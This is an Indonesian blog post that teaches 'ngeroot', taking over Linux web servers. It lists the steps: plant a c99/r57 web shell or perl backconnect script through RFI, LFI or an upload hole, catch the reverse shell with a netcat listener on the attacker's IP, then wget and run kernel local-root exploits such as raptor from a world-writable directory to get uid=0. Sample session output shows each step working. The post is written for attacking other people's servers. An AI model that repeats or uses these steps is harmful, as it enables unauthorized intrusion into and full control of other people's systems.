Root merupakan akar dari sebuah system
UNIX, untuk mendapatkan akses dan bagi kalangan hacker bisa dibilang Ngeroot tujuan ngerrot yaitu
mendapatkan hak akses sever target karena root merupakan akses level tertinggi
dalam OS UNIX
Selanjutnya kita coba Ngeroot :
Selanjutnya kita coba Ngeroot :
- Sediakan server / pc untuk menjalankan Netcat
- Sediakan target yang sudah kita dapat dari (RFI/SHELLUPLOAD/LFI/DSB) yang safemode (OFF)
- Sedikan juga shell injection tools (c99, r57, dsb) yang didalamnya tersedia fasilitas untuk backconnect / gunakan perl backconnect tools
- Sediakan Netcat (NC) untuk menerima connection dari backconnect
- Sediakan local root exploit yang sesuai dengan kernel target
Yang harus anda lakukan adalah :
Umpamakan bahwa:
IPHOSTSERVER ANDA = 100.100.100.100
PORT SERVER NETCAT ANDA: 10000
Langkah pertama cara ngeroot:
Pastikan bahwa Netcat sudah
terinstall & Anda sudah menjalankan Netcat pada Server Anda.
Commandnya sangat sederhana: netcat
-n -l -v -p PORT
Contoh: netcat -n -l -v -p 10000
binushacker@ourbox:~$ nc -n -l -v -p
10000
Listening on [any] 10000 …
Listening on [any] 10000 …
Langkah kedua cara ngeroot:
Pastikan bahwa anda sudah melakukan
upload c99 / r57 ke server dimana didalamnya terdapat fasilitas backconnect.
Jadi kita tinggal masukkan IP server kita,
Jika anda menggunakan perl
backconnect tools, anda cukup ketikkan perintah: perl backconnectortools.txt
IPHOSTSEVERANDA PORT
Contoh:
perl backconnect.txt 100.100.100.100
10000
Langkah ketiga cara ngeroot:
Tunggulan sampai ada connection dari
server target ke server anda, biasanya akan muncul pesan bahwa terdapat koneksi
ke server anda dari target.
Contoh:
agungnet@ourbox:~$ nc -n -l -v -p
10000
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Listening on [any] 10000 …
Connect to [195.13.10.210] from localhost [127.0.0.1] 10000
Linux www.target.com 2.6.16 #1 SMP Fri Jun 01 17:19:41 EST NEW 2007 i686 i686 i386 GNU/Linux
uid=48(apache) gid=48(apache) groups=48(apache)
Langkah ke-empat cara ngeroot:
Anda sudah terkoneksi ke target,
disinilah anda harus pandai-pandai menggunakan command Unix. Anda bisa belajar
lebih dahulu command” Unix server.
Apabila sudah terkoneksi, maka
persiapkanlah LOCAL EXPLOIT UNTUK KERNEL SERVER, ada banyak tools untuk local
disesuaikan dengan kebutuhan.
Karena kernel target adalah 2.6.16,
maka kita akan menggunakan 2.6.16 -> raptor, raptor2, h0llyshit, prctl
untuk exploitnya.
Informasi mengenai local exploit
untuk masing” kernel bisa dicari google,
Oke kita lanjut, setelah itu kita
wget file raptor, kita tempatkan di yang permissionnya bisa execute.
Kita cari saja yang 777 (misal: /var/tmp).
Kemudian kita jalankan perintahnya: ./raptor
w00t: uid=0(root) gid=0(root)
groups=0(root)
whoami
uid=0(root) gid=0(root)
groups=0(root)
Nahh anda sudah dapat root..
Tidak ada komentar:
Posting Komentar
Terima Kasih Atas Kunjungan & Komentar Anda di Agung Blog